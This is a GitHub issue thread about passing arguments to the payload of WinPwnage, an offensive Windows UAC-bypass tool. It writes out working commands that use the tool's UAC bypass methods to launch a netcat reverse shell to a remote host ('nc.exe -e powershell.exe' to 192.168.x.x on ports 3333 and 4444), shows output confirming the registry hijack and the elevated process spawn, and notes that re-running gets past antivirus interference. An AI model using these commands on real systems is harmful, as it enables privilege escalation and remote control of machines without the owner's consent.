### ISSUE TITLE
Payload with parameters

### ISSUE THREAD

**Issue by exploide** [rootm0s/WinPwnage#72]
Hello and thank you for the useful tool!

I would like to ask for clarification concerning the `--payload` parameter. The help output indicates it is possible to pass parameters to the payload.

When I do `.\winpwnage.exe -u uac -i 3 -p "c:\windows\temp\nc.exe -e powershell.exe 192.168.178.10 3333"`, I get the error that the payload is invalid. I can guess why, because it tries to find an executable named like the fully quoted string.

But when I do `.\winpwnage.exe -u uac -i 3 -p c:\windows\temp\nc.exe -e powershell.exe 192.168.178.10 3333`, without the quotes, winpwnage aborts because it tries to interpret the `-e` option by its own.

How does passing parameters to the payload work in this case? And how is it even possible to distinguish payload parameters from further payloads? (The latter question arises because `--payload` is defined with `nargs="+"`.)

**Comment by rootm0s** [comment]
Hey! I know its really messy right now and it needs to be re-written in the future. At the moment, it only works with some payload parameters. Feel free to help out if you are interested in the project 😃 

**This works for me:**
`main.py --use uac --id 3 --payload c:\\windows\\system32\\cmd.exe /k whoami`

If winpwnage exits like this, it's most likely caused by a Anti-Virus. Re-running the command again will execute the payload though.
```
 [!] Attempting to run method (3) configured with payload (['c:\\\\windows\\\\system32\\\\cmd.exe', '/k', 'whoami'])
 [+] Successfully created Default and DelegateExecute key containing payload (c:\\windows\\system32\\cmd.exe /k whoami)
```

After re-run:
```
 [!] Attempting to run method (3) configured with payload (['c:\\\\windows\\\\system32\\\\cmd.exe', '/k', 'whoami'])
 [+] Successfully created Default and DelegateExecute key containing payload (c:\\windows\\system32\\cmd.exe /k whoami)
 [!] Disabling file system redirection
 [+] Successfully disabled file system redirection
 [+] Successfully spawned process (c:\\windows\\system32\\cmd.exe /k whoami)
 [!] Performing cleaning
 [+] Successfully cleaned up
 [+] All done!
```

**Comment by rootm0s** [comment]
After some testing, im not sure why argparse is handling the "-e" payload param.

This function seems to sanitize the payload params correctly.
```python
class payloads():
	def exe(self, payload):
		if os.path.isfile(os.path.join(payload[0])) and payload[0].endswith(".exe"):
			commandline = ""
			for index, object in enumerate(payload):
				if index >= len(payload)-1:
					commandline += payload[index]
				else:
					commandline += payload[index] + " "
			return True, commandline
		else:
			return False
```

**Comment by exploide** [comment]
That's the message I get:
```
> python main.py -u uac -i 2 -p C:\Users\user\Downloads\nc.exe -e powershell.exe 192.168.122.1 4444

        _
  _ _ _|_|___ ___ _ _ _ ___ ___ ___ ___
 | | | | |   | . | | | |   | .'| . | -_|
 |_____|_|_|_|  _|_____|_|_|__,|_  |___|
             |_|               |___|

 [!] UAC level: 3
 [!] Build number: 18363
 [!] Running elevated: False
 [!] Python version: 3.8.3

usage: main.py [-h] [-s SCAN [SCAN ...]] [-u USE [USE ...]] [-i ID [ID ...]] [-p PAYLOAD [PAYLOAD ...]] [-r]
main.py: error: unrecognized arguments: -e powershell.exe 192.168.122.1 4444
```

But turns out it's easy to workaround by just quoting the payload's parameters:

```
> python main.py -u uac -i 2 -p C:\Users\user\Downloads\nc.exe "-e powershell.exe 192.168.122.1 4444"

        _
  _ _ _|_|___ ___ _ _ _ ___ ___ ___ ___
 | | | | |   | . | | | |   | .'| . | -_|
 |_____|_|_|_|  _|_____|_|_|__,|_  |___|
             |_|               |___|

 [!] UAC level: 3
 [!] Build number: 18363
 [!] Running elevated: False
 [!] Python version: 3.8.3

 [!] Attempting to run method (2) configured with payload (['C:\\Users\\user\\Downloads\\nc.exe', '-e powershell.exe 192.168.122.1 4444'])
 [+] Successfully created Default and DelegateExecute key containing payload (C:\Users\user\Downloads\nc.exe -e powershell.exe 192.168.122.1 4444)
 [!] Disabling file system redirection
 [+] Successfully disabled file system redirection
 [+] Successfully spawned process (C:\Users\user\Downloads\nc.exe -e powershell.exe 192.168.122.1 4444)
 [!] Performing cleaning
 [+] Successfully cleaned up
 [+] All done!
```

So this works sufficiently well, even for arguments containing the minus sign or dash.

Feel free to close this issue. I would close it on my own but I'm not sure if you plan parser enhancements anyway.

**Comment by rootm0s** [comment]
Great it works good enough! 

Yeah Its a good improvement so i'll add it to the todo list 👍
